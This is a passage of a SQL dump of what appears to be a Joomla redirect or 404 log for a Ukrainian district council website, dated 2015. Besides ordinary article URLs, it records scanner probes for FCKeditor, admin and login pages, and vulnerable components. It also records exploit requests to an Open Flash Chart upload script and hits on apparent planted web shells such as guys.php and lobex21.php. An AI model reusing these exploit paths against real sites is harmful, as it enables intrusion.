00:00:00',301),(12357,'http://www.malyn-rayrada.org.ua/index.php?option=com_userlist','','','',1,0,'2015-02-08 15:20:56','0000-00-00 00:00:00',301),(12358,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1355:2014-07-02-06-11-04&lang=ru&option=com_content&view=article','','','',3,0,'2015-02-08 16:59:32','0000-00-00 00:00:00',301),(12359,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1248:2014-03-21-18-16-44&lang=ru&option=com_content&view=article','','','',1,0,'2015-02-08 17:12:05','0000-00-00 00:00:00',301),(12360,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1243:2014-03-17-07-32-47&lang=ru&option=com_content&view=article','','','',3,0,'2015-02-08 23:59:49','0000-00-00 00:00:00',301),(12361,'http://www.malyn-rayrada.org.ua/index.php/922-do-vidoma-deputativ-rajonnoji-radi-informatsiya-shchodo-provedennya-postijnikh-komisij?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-02-09 08:43:16','0000-00-00 00:00:00',301),(12362,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1115:-24-&tmpl=component&print=1&layout=default&page=&lang=uk','','','',1,0,'2015-02-09 14:54:52','0000-00-00 00:00:00',301),(12363,'http://www.malyn-rayrada.org.ua/index.php/1007-malinski-podatkivtsi-zaproshuyut-na-seminar','','','',18,0,'2015-02-10 03:52:25','0000-00-00 00:00:00',301),(12364,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/926-pro-zatverdzhennya-pereliku-ob-ektiv-shcho-pidlyagayut-privatizatsiji-u-2014-2015-rokakh?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-02-10 09:33:24','0000-00-00 00:00:00',301),(12365,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/928-pro-spisannya-osnovnikh-zasobiv-viddil-osviti?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-02-10 09:33:37','0000-00-00 00:00:00',301),(12366,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/930-pro-nadannya-dozvolu-na-vidchuzhennya-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-02-10 09:33:50','0000-00-00 00:00:00',301),(12367,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/926-pro-zatverdzhennya-pereliku-ob-ektiv-shcho-pidlyagayut-privatizatsiji-u-2014-2015-rokakh','','','',1,0,'2015-02-10 13:08:11','0000-00-00 00:00:00',301),(12368,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/930-pro-nadannya-dozvolu-na-vidchuzhennya-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',6,0,'2015-02-10 13:08:38','0000-00-00 00:00:00',301),(12369,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1107:c-&tmpl=component&print=1&layout=default&page=&lang=uk','','','',1,0,'2015-02-10 15:04:07','0000-00-00 00:00:00',301),(12370,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/926-pro-zatverdzhennya-pereliku-ob-ektiv-shcho-pidlyagayut-privatizatsiji-u-2014-2015-rokakh?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-02-11 15:14:06','0000-00-00 00:00:00',301),(12371,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/928-pro-spisannya-osnovnikh-zasobiv-viddil-osviti?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-02-11 15:14:18','0000-00-00 00:00:00',301),(12372,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/930-pro-nadannya-dozvolu-na-vidchuzhennya-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-02-11 15:14:32','0000-00-00 00:00:00',301),(12373,'http://malyn-rayrada.org.ua/register/','','','',4,0,'2015-02-11 17:50:28','0000-00-00 00:00:00',301),(12374,'http://malyn-rayrada.org.ua/login.php','','','',4,0,'2015-02-11 17:50:31','0000-00-00 00:00:00',301),(12375,'http://malyn-rayrada.org.ua/signup.php','','','',4,0,'2015-02-11 17:50:34','0000-00-00 00:00:00',301),(12376,'http://www.malyn-rayrada.org.ua/webmanage/fckeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:47:41','0000-00-00 00:00:00',301),(12377,'http://www.malyn-rayrada.org.ua/WebAdmin/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:47:45','0000-00-00 00:00:00',301),(12378,'http://www.malyn-rayrada.org.ua/system/fckeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:47:47','0000-00-00 00:00:00',301),(12379,'http://www.malyn-rayrada.org.ua/public/js/fckeditor/fckeditor.html','','','',1,0,'2015-02-12 13:47:53','0000-00-00 00:00:00',301),(12380,'http://www.malyn-rayrada.org.ua/path/fckeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:48:04','0000-00-00 00:00:00',301),(12381,'http://www.malyn-rayrada.org.ua/oa/fckeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:48:15','0000-00-00 00:00:00',301),(12382,'http://www.malyn-rayrada.org.ua/mods/ckeditor/fckeditor.html','','','',1,0,'2015-02-12 13:48:23','0000-00-00 00:00:00',301),(12383,'http://www.malyn-rayrada.org.ua/manage/fckeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:48:26','0000-00-00 00:00:00',301),(12384,'http://www.malyn-rayrada.org.ua/manage/editor/fckeditor.html','','','',1,0,'2015-02-12 13:48:31','0000-00-00 00:00:00',301),(12385,'http://www.malyn-rayrada.org.ua/login/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:48:33','0000-00-00 00:00:00',301),(12386,'http://www.malyn-rayrada.org.ua/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:48:37','0000-00-00 00:00:00',301),(12387,'http://www.malyn-rayrada.org.ua/includes/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:48:41','0000-00-00 00:00:00',301),(12388,'http://www.malyn-rayrada.org.ua/fckeditor1/editor/fckeditor.html','','','',1,0,'2015-02-12 13:48:51','0000-00-00 00:00:00',301),(12389,'http://www.malyn-rayrada.org.ua/fckeditor_ap/editor/fckeditor.html','','','',1,0,'2015-02-12 13:48:54','0000-00-00 00:00:00',301),(12390,'http://www.malyn-rayrada.org.ua/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:48:57','0000-00-00 00:00:00',301),(12391,'http://www.malyn-rayrada.org.ua/fck/editor/fckeditor.html','','','',1,0,'2015-02-12 13:49:01','0000-00-00 00:00:00',301),(12392,'http://www.malyn-rayrada.org.ua/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:49:05','0000-00-00 00:00:00',301),(12393,'http://www.malyn-rayrada.org.ua/editor/fckeditor.html','','','',1,0,'2015-02-12 13:49:09','0000-00-00 00:00:00',301),(12394,'http://www.malyn-rayrada.org.ua/edit/editor/fckeditor.html','','','',1,0,'2015-02-12 13:49:23','0000-00-00 00:00:00',301),(12395,'http://www.malyn-rayrada.org.ua/cms/fckeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:49:27','0000-00-00 00:00:00',301),(12396,'http://www.malyn-rayrada.org.ua/bbadmin/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:49:35','0000-00-00 00:00:00',301),(12397,'http://www.malyn-rayrada.org.ua/administrator/fckeditor1/editor/fckeditor.html','','','',1,0,'2015-02-12 13:49:40','0000-00-00 00:00:00',301),(12398,'http://www.malyn-rayrada.org.ua/administrator/fckeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:49:43','0000-00-00 00:00:00',301),(12399,'http://www.malyn-rayrada.org.ua/administrator/editors/fckeditor/fckeditor.html','','','',1,0,'2015-02-12 13:49:46','0000-00-00 00:00:00',301),(12400,'http://www.malyn-rayrada.org.ua/admin/system/editor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:49:49','0000-00-00 00:00:00',301),(12401,'http://www.malyn-rayrada.org.ua/admin/fckeditor1/editor/fckeditor.html','','','',1,0,'2015-02-12 13:49:53','0000-00-00 00:00:00',301),(12402,'http://www.malyn-rayrada.org.ua/admin/fckeditor_ap/editor/fckeditor.html','','','',1,0,'2015-02-12 13:50:00','0000-00-00 00:00:00',301),(12403,'http://www.malyn-rayrada.org.ua/admin/fck/editor/fckeditor.html','','','',1,0,'2015-02-12 13:50:06','0000-00-00 00:00:00',301),(12404,'http://www.malyn-rayrada.org.ua/admin/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-02-12 13:50:09','0000-00-00 00:00:00',301),(12405,'http://www.malyn-rayrada.org.ua/admin/editor/fckeditor.html','','','',1,0,'2015-02-12 13:50:12','0000-00-00 00:00:00',301),(12406,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1041:2013-07-02-13-55-38&tmpl=component&print=1&layout=default&page=&lang=uk','','','',1,0,'2015-02-13 06:55:09','0000-00-00 00:00:00',301),(12407,'http://www.malyn-rayrada.org.ua/webalizer/','','http://www.malyn-rayrada.org.ua/webalizer/','',2,0,'2015-02-13 09:08:32','0000-00-00 00:00:00',301),(12408,'http://www.malyn-rayrada.org.ua/stats/','','http://www.malyn-rayrada.org.ua/stats/','',1,0,'2015-02-14 07:54:24','0000-00-00 00:00:00',301),(12409,'http://www.malyn-rayrada.org.ua/webstats/','','http://www.malyn-rayrada.org.ua/webstats/','',1,0,'2015-02-15 02:13:49','0000-00-00 00:00:00',301),(12410,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1072:-24-6-&tmpl=component&print=1&layout=default&page=&lang=uk','','','',1,0,'2015-02-15 03:50:50','0000-00-00 00:00:00',301),(12411,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1045:-21-2012-354&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2015-02-16 02:22:40','0000-00-00 00:00:00',301),(12412,'http://malyn-rayrada.org.ua/Tr/index.php','','','',1,0,'2015-02-16 04:20:10','0000-00-00 00:00:00',301),(12413,'http://www.malyn-rayrada.org.ua/usage/','','http://www.malyn-rayrada.org.ua/usage/','',1,0,'2015-02-16 12:11:50','0000-00-00 00:00:00',301),(12414,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1105:2013-10-11-16-43-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2015-02-16 19:03:04','0000-00-00 00:00:00',301),(12415,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1074:2013-09-02-05-02-30&tmpl=component&print=1&layout=default&page=&lang=uk','','','',1,0,'2015-02-19 07:35:52','0000-00-00 00:00:00',301),(12416,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1071:2013-08-27-14-06-18&tmpl=component&print=1&layout=default&page=&lang=uk','','','',1,0,'2015-02-20 11:59:13','0000-00-00 00:00:00',301),(12417,'http://www.malyn-rayrada.org.ua/docs/index.php','','','',1,0,'2015-02-20 23:54:02','0000-00-00 00:00:00',301),(12418,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1073:2013-08-30-11-12-19&tmpl=component&print=1&layout=default&page=&lang=uk','','','',1,0,'2015-02-21 05:43:30','0000-00-00 00:00:00',301),(12419,'http://malyn-rayrada.org.ua//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=guys.php','','','',1,0,'2015-02-21 12:47:57','0000-00-00 00:00:00',301),(12420,'http://malyn-rayrada.org.ua//administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/guys.php?rf','','','',1,0,'2015-02-21 12:48:00','0000-00-00 00:00:00',301),(12421,'http://malyn-rayrada.org.ua/webboard/index.php','','','',1,0,'2015-02-21 13:50:55','0000-00-00 00:00:00',301),(12422,'http://www.malyn-rayrada.org.ua/images/stories/newNight.php?rf','','','',2,0,'2015-02-21 15:13:43','0000-00-00 00:00:00',301),(12423,'http://www.malyn-rayrada.org.ua//administrator/components/com_jinc/classes/graphics/tmp-upload-images/lobex21.php?rf','','','',2,0,'2015-02-21 16:04:41','0000-00-00 00:00:00',301),(12424,'http://www.malyn-rayrada.org.ua/user','','','',2,0,'2015-02-21 21:04:37','0000-00-00 00:00:00',301),(12425,'http://www.malyn-rayrada.org.ua/index.php/1011-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi','','','',120,0,'2015-02-22 19:12:54','0000-00-00 00:00:00',301),(12426,'http://www.malyn-rayrada.org.ua/templates/rada1/wp-login.php','','','',1,0,'2015-02-23 03:09:26','0000-00-00 00:00:00',301),(12427,'http://www.malyn-rayrada.org.ua/templates/rada1/administrator/index.php','','','',1,0,'2015-02-23 03:09:28','0000-00-00 00:00:00',301),(12428,'http://www.malyn-rayrada.org.ua/media/system/css/wp-login.php','','','',1,0,'2015-02-23 03:09:30','0000-00-00 00:00:00',301),(12429,'http://www.malyn-rayrada.org.ua/media/system/css/administrator/index.php','','','',1,0,'2015-02-23 03:09:32','0000-00-00 00:00:00',301),(12430,'http://www.malyn-rayrada.org.ua/components/com_k2/css/wp-login.php','','','',1,0,'2015-02-23 03:09:34','0000-00-00 00:00:00',301),(12431,'http://www.malyn-rayrada.org.ua/components/com_k2/css/administrator/index.php','','','',1,0,'2015-02-23 03:09:36','0000-00-00 00:00:00',301),(12432,'http://www.malyn-rayrada.org.ua/media/com_attachments/css/wp-login.php','','','',1,0,'2015-02-23 03:09:38','0000-00-00 00:00:00',301),(12433,'http://www.malyn-rayrada.org.ua/media/com_attachments/css/administrator/index.php','','','',1,0,'2015-02-23 03:09:39','0000-00-00 00:00:00',301),(12434,'http://www.malyn-rayrada.org.ua/plugins/system/jcemediabox/css/wp-login.php','','','',1,0,'2015-02-23 03:09:41','0000-00-00 00:00:00',301),(12435,'http://www.malyn-rayrada.org.ua/plugins/system/jcemediabox/css/administrator/index.php','','','',1,0,'2015-02-23 03:09:43','0000-00-00 00:00:00',301),(12436,'http://www.malyn-rayrada.org.ua/plugins/system/jcemediabox/themes/standard/css/wp-login.php','','','',1,0,'2015-02-23 03:09:46','0000-00-00 00:00:00',301),(12437,'http://www.malyn-rayrada.org.ua/plugins/system/jcemediabox/themes/standard/css/administrator/index.php','','','',1,0,'2015-02-23 03:09:48','0000-00-00 00:00:00',301),(12438,'http://www.malyn-rayrada.org.ua/media/mod_vvisit_counter/digit_counter/wp-login.php','','','',1,0,'2015-02-23 03:09:50','0000-00-00 00:00:00',301),(12439,'http://www.malyn-rayrada.org.ua/media/mod_vvisit_counter/digit_counter/administrator/index.php','','','',1,0,'2015-02-23 03:09:52','0000-00-00 00:00:00',301),(12440,'http://www.malyn-rayrada.org.ua/media/mod_vvisit_counter/stats/wp-login.php','','','',1,0,'2015-02-23 03:09:54','0000-00-00 00:00:00',301),(12441,'http://www.malyn-rayrada.org.ua/media/mod_vvisit_counter/stats/administrator/index.php','','','',1,0,'2015-02-23 03:09:56','0000-00-00 00:00:00',301),(12442,'http://www.malyn-rayrada.org.ua/modules/mod_marqueeaholic/css/wp-login.php','','','',1,0,'2015-02-23 03:09:58','0000-00-00 00:00:00',301),(12443,'http://www.malyn-rayrada.org.ua/modules/mod_marqueeaholic/css/administrator/index.php','','','',1,0,'2015-02-23 03:10:00','0000-00-00 00:00:00',301),(12444,'http://www.malyn-rayrada.org.ua/templates/system/css/wp-login.php','','','',1,0,'2015-02-23 03:10:02','0000-00-00 00:00:00',301),(12445,'http://www.malyn-rayrada.org.ua/templates/system/css/administrator/index.php','','','',1,0,'2015-02-23 03:10:04','0000-00-00 00:00:00',301),(12446,'http://www.malyn-rayrada.org.ua/templates/rada1/css/wp-login.php','','','',1,0,'2015-02-23 03:10:06','0000-00-00 00:00:00',301),(12447,'http://www.malyn-rayrada.org.ua/templates/rada1/css/administrator/index.php','','','',1,0,'2015-02-23 03:10:08','0000-00-00 00:00:00',301),(12448,'http://www.malyn-rayrada.org.ua/index.php/wp-login.php','','','',1,0,'2015-02-23 03:10:10','0000-00-00 00:00:00',301),(12449,'http://www.malyn-rayrada.org.ua/index.php/administrator/index.php','','','',1,0,'2015-02-23 03:10:11','0000-00-00 00:00:00',301),(12450,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/wp-login.php','','','',1,0,'2015-02-23 03:10:12','0000-00-00 00:00:00',301),(12451,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/administrator/index.php','','','',1,0,'2015-02-23 03:10:15','0000-00-00 00:00:00',301),(12452,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/wp-login.php','','','',1,0,'2015-02-23 03:10:20','0000-00-00 00:00:00',301),(12453,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/administrator/index.php','','','',1,0,'2015-02-23 03:10:24','0000-00-00 00:00:00',301),(12454,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/wp-login.php','','','',1,0,'2015-02-23 03:10:24','0000-00-00 00:00:00',301),(12455,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/administrator/index.php','','','',1,0,'2015-02-23 03:10:26','0000-00-00 00:00:00',301),(12456,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/wp-login.php','','','',1,0,'2015-02-23 03:10:27','0000-00-00 00:00:00',301),(12457,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/administrator/index.php','','','',1,0,'2015-02-23 03:10:30','0000-00-00 00:00:00',301),(12458,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58/wp-login.php','','','',1,0,'2015-02-23 03:10:35','0000-00-00 00:00:00',301),(12459,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58/administrator/index.php','','','',1,0,'2015-02-23 03:10:37','0000-00-00 00:00:00',301),(12460,'http://www.malyn-rayrada.org.ua/attachments/article/26/administrator/index.php','','','',1,0,'2015-02-23 03:10:40','0000-00-00 00:00:00',301),(12461,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/wp-login.php','','','',1,0,'2015-02-23 03:10:41','0000-00-00 00:00:00',301),(12462,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/administrator/index.php','','','',1,0,'2015-02-23 03:10:45','0000-00-00 00:00:00',301),(12463,'http://www.malyn-rayrada.org.ua/media/joomgallery/css/wp-login.php','','','',1,0,'2015-02-23 03:10:45','0000-00-00 00:00:00',301),(12464,'http://www.malyn-rayrada.org.ua/media/joomgallery/css/administrator/index.php','','','',1,0,'2015-02-23 03:10:47','0000-00-00 00:00:00',301),(12465,'http://www.malyn-rayrada.org.ua/media/joomgallery/js/slimbox/css/wp-login.php','','','',1,0,'2015-02-23 03:10:49','0000-00-00 00:00:00',301),(12466,'http://www.malyn-rayrada.org.ua/media/joomgallery/js/slimbox/css/administrator/index.php','','','',1,0,'2015-02-23 03:10:52','0000-00-00 00:00:00',301),(12467,'http://malyn-rayrada.org.ua/admin/index.php','','','',5,0,'2015-02-23 08:32:26','0000-00-00 00:00:00',301),(12468,'http://malyn-rayrada.org.ua/bitrix/admin/index.php?lang=en','','','',6,0,'2015-02-23 08:32:28','0000-00-00 00:00:00',301),(12469,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=.Z.pHp','','','',1,0,'2015-02-23 17:18:54','0000-00-00 00:00:00',301),(12470,'http://www.malyn-rayrada.org.ua/index.php/rishennya-vid-25-02-2015-roku','','','',1,0,'2015-02-25 19:33:48','0000-00-00 00:00:00',301),(12471,'http://malyn-rayrada.org.ua/customer/account/login','','http://malyn-rayrada.org.ua/customer/account/login','',1,0,'2015-02-26 18:48:10','0000-00-00 00:00:00',301),(12472,'http://www.malyn-rayrada.org.ua/index.php?option=com_quran','','','',1,0,'2015-02-26 23:49:44','0000-00-00 00:00:00',301),(12473,'http://www.malyn-rayrada.org.ua/index.php?option=com_flippingbook','','','',1,0,'2015-02-26 23:49:46','0000-00-00 00:00:00',301),(12474,'http://www.malyn-rayrada.org.ua/index.php?option=com_dtregister','','','',1,0,'2015-02-26 23:49:47','0000-00-00 00:00:00',301),(12475,'http://www.malyn-rayrada.org.ua/index.php?option=com_ezstore','','','',1,0,'2015-02-26 23:49:48','0000-00-00 00:00:00',301),(12476,'http://www.malyn-rayrada.org.ua/index.php?option=com_fireboard','','','',1,0,'2015-02-26 23:49:50','0000-00-00 00:00:00',301),(12477,'http://www.malyn-rayrada.org.ua/index.php?option=com_productbook','','','',1,0,'2015-02-26 23:49:51','0000-00-00 00:00:00',301),(12478,'http://www.malyn-rayrada.org.ua/index.php?option=com_gigcal','','','',1,0,'2015-02-26 23:49:52','0000-00-00 00:00:00',301),(12479,'http://www.malyn-rayrada.org.ua/index.php?option=com_news','','','',1,0,'2015-02-26 23:49:53','0000-00-00 00:00:00',301),(12480,'http://www.malyn-rayrada.org.ua/index.php?option=com_jfusion','','','',1,0,'2015-02-26 23:49:55','0000-00-00 00:00:00',301),(12481,'http://www.malyn-rayrada.org.ua/index.php?option=com_rsgallery2','','','',1,0,'2015-02-26 23:49:56','0000-00-00 00:00:00',301),(12482,'http://www.malyn-rayrada.org.ua/index.php?option=com_idoblog','','','',1,0,'2015-02-26 23:49:57','0000-00-00 00:00:00',301),(12483,'http://www.malyn-rayrada.org.ua/index.php?option=com_tpjobs','','','',1,0,'2015-02-26 23:49:59','0000-00-00 00:00:00',301),(12484,'http://www.malyn-rayrada.org.ua/index.php?option=com_fastball','','','',1,0,'2015-02-26 23:50:00','0000-00-00 00:00:00',301),(12485,'http://www.malyn-rayrada.org.ua/index.php/component/blog_calendar/','','','',1,0,'2015-02-26 23:50:02','0000-00-00 00:00:00',301),(12486,'http://www.malyn-rayrada.org.ua/index.php?option=com_realty','','','',1,0,'2015-02-26 23:50:04','0000-00-00 00:00:00',301),(12487,'http://www.malyn-rayrada.org.ua/index.php?option=com_ponygallery','','','',1,0,'2015-02-26 23:50:05','0000-00-00 00:00:00',301),(12488,'http://www.malyn-rayrada.org.ua/index.php?option=com_spidercalendar','','','',1,0,'2015-02-26 23:50:06','0000-00-00 00:00:00',301),(12489,'http://malyn-rayrada.org.ua/index.php/1007-malinski-podatkivtsi-zaproshuyut-na-seminar','','','',8,0,'2015-03-01 20:10:47','0000-00-00 00:00:00',301),(12490,'http://www.malyn-rayrada.org.ua//wp-login.php','','','',2,0,'2015-03-02 10:53:34','0000-00-00 00:00:00',301),(12491,'http://malyn-rayrada.org.ua/attachments/article/945/Матеріали Буркуш.pdf','','','',2,0,'2015-03-05 11:09:49','0000-00-00 00:00:00',301),(12492,'http://malyn-rayrada.org.ua/file.php','','','',1,0,'2015-03-05 11:46:38','0000-00-00 00:00:00',301),(12493,'http://www.malyn-rayrada.org.ua/default.php','','','',1,0,'2015-03-06 05:32:46','0000-00-00 00:00:00',301),(12494,'http://www.malyn-rayrada.org.ua/cgi-bin/default.php','','','',1,0,'2015-03-06 05:32:48','0000-00-00 00:00:00',301),(12495,'http://www.malyn-rayrada.org.ua/tmp/configuration.php','','','',1,0,'2015-03-06 05:32:51','0000-00-00 00:00:00',301),(12496,'http://www.malyn-rayrada.org.ua/images/stories/filemga.php','','','',1,0,'2015-03-06 05:32:54','0000-00-00 00:00:00',301),(12497,'http://www.malyn-rayrada.org.ua/tmp/php.class.php','','','',1,0,'2015-03-06 05:32:57','0000-00-00 00:00:00',301),(12498,'http://www.malyn-rayrada.org.ua/images/stories/index_old.php','','','',1,0,'2015-03-06 05:32:59','0000-00-00 00:00:00',301),(12499,'http://www.malyn-rayrada.org.ua/tmp/index_old.php','','','',2,0,'2015-03-06 05:33:02','0000-00-00 00:00:00',301),(12500,'http://www.malyn-rayrada.org.ua/index.php/958-do-vidoma-deputativ-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-03-06 07:46:57','0000-00-00 00:00:00',301),(12501,'http://malyn-rayrada.org.ua/index.php/1028-vitaemo-iz-svyatom-vesni','','','',3,0,'2015-03-06 08:13:21','0000-00-00 00:00:00',301),(12502,'http://www.malyn-rayrada.org.ua/index.php/1030-vitaemo-iz-svyatom-vesni','','','',11,0,'2015-03-06 18:23:23','0000-00-00 00:00:00',301),(12503,'http://www.malyn-rayrada.org.ua/index.php/1028-vitaemo-iz-svyatom-vesni','','','',17,0,'2015-03-07 03:17:44','0000-00-00 00:00:00',301),(12504,'http://malyn-rayrada.org.ua/index.php/1030-vitaemo-iz-svyatom-vesni','','','',2,0,'2015-03-07 03:24:12','0000-00-00 00:00:00',301),(12505,'http://www.malyn-rayrada.org.ua/index.php/component/user/?task=register','','http://www.malyn-rayrada.org.ua/index.php?option=com_user&view=register','',46,0,'2015-03-07 18:46:16','0000-00-00 00:00:00',301),(12506,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1008-pro-zatverdzhennya-spisku-prisyazhnikh-malinskogo-rajonnogo-sudu','','','',151,0,'2015-03-08 01:01:14','0000-00-00 00:00:00',301),(12507,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1377:-23-&catid=11&lang=ru','','','',1,0,'2015-03-08 17:50:43','0000-00-00 00:00:00',301),(12508,'http://malyn-rayrada.org.ua/index.php/1011-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi','','','',5,0,'2015-03-09 18:36:05','0000-00-00 00:00:00',301),(12509,'http://malyn-rayrada.org.ua/index.php/1011-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-03-09 22:41:31','0000-00-00 00:00:00',301),(12510,'http://malyn-rayrada.org.ua/index.php/1019-pro-sklikannya-37-pozachergovoji-sesiji-rajonnoji-radi-6-sklikannya','','','',5,0,'2015-03-09 22:41:54','0000-00-00 00:00:00',301),(12511,'http://malyn-rayrada.org.ua/index.php/1019-pro-sklikannya-37-pozachergovoji-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-03-09 22:55:07','0000-00-00 00:00:00',301),(12512,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1008-pro-zatverdzhennya-spisku-prisyazhnikh-malinskogo-rajonnogo-sudu','','','',8,0,'2015-03-09 22:57:15','0000-00-00 00:00:00',301),(12513,'http://www.malyn-rayrada.org.ua/index.php/component/user/register','','','',9,0,'2015-03-10 17:32:55','0000-00-00 00:00:00',301),(12514,'http://www.malyn-rayrada.org.ua/index.php/1019-pro-sklikannya-37-pozachergovoji-sesiji-rajonnoji-radi-6-sklikannya','','','',14,0,'2015-03-11 05:44:48','0000-00-00 00:00:00',301),(12515,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&Itemid=14&lang=uk','','','',1,0,'2015-03-11 14:41:41','0000-00-00 00:00:00',301),(12516,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&Itemid=18&lang=uk','','','',1,0,'2015-03-11 14:41:42','0000-00-00 00:00:00',301),(12517,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&lang=en','','','',1,0,'2015-03-11 14:41:42','0000-00-00 00:00:00',301),(12518,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&Itemid=14&lang=en','','','',1,0,'2015-03-11 14:41:43','0000-00-00 00:00:00',301),(12519,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=854:2012-12-11-13-40-55&Itemid=64&lang=ru','','','',2,0,'2015-03-11 14:42:13','0000-00-00 00:00:00',301),(12520,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&Itemid=88&lang=uk','','','',1,0,'2015-03-11 14:42:16','0000-00-00 00:00:00',301),(12521,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&Itemid=14&lang=en','','','',1,0,'2015-03-11 14:44:50','0000-00-00 00:00:00',301),(12522,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&lang=uk','','','',1,0,'2015-03-11 14:44:52','0000-00-00 00:00:00',301),(12523,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1112:2013-10-23-09-24-43&Itemid=70&lang=en','','','',1,0,'2015-03-11 14:44:52','0000-00-00 00:00:00',301),(12524,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&Itemid=14&lang=en','','','',1,0,'2015-03-11 14:44:54','0000-00-00 00:00:00',301),(12525,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&Itemid=14&lang=en','','','',1,0,'2015-03-11 14:44:54','0000-00-00 